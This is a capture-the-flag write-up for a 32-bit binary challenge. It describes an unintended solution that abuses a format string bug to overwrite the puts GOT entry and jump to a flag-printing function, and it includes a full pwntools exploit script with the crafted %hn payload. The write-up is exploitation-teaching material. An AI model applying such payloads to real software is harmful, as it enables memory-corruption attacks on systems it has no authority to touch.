This challenge wasn’t suppose to be solved like this when I was discussing it with the author. To check out the intentional way, check out Finches in PIE. It is similar to this one except, PIE is enabled.
flag.txt (You need this in same directory as fiap for local exploit. fiap will read flag once you exploit it)
When you run the program, it will ask you for two inputs. And it talks about canary. I am guessing that you have to leak the canary and over ride the ret with the first input. Then fix the overwritten canary with the leaked canary.
There is handy function called flag that prints out the flag
In say_hi(), we can see that the first_input can be used for format string vuln.
Second input also uses gets() so we can use it for BoF.
Looking at this problem, you can just use format string exploit to write to puts.got since after printf(&first_input) it will run puts and since we don’t return, we can go to flag function.
#!/usr/bin/python2.7 from pwn import * isLocal = True if isLocal: p = process("./fias") else: p = remote("126.96.36.199", 34995) elf = ELF("./fias") GOT_PUTS = elf.got['puts'] # 0x804c01c FUNC_FLAG = elf.sym['flag'] # 0x080491d2 p.recvline() p.recvline() #Flag addr 0x080491d2 p.sendline(p32(GOT_PUTS+2) + '@@@@' + p32(GOT_PUTS) + '%.8x' * 4 + '%.2008x%hn' + '%.35278x%hn') p.recvline() p.recvline() p.recvline() print(p.recvline())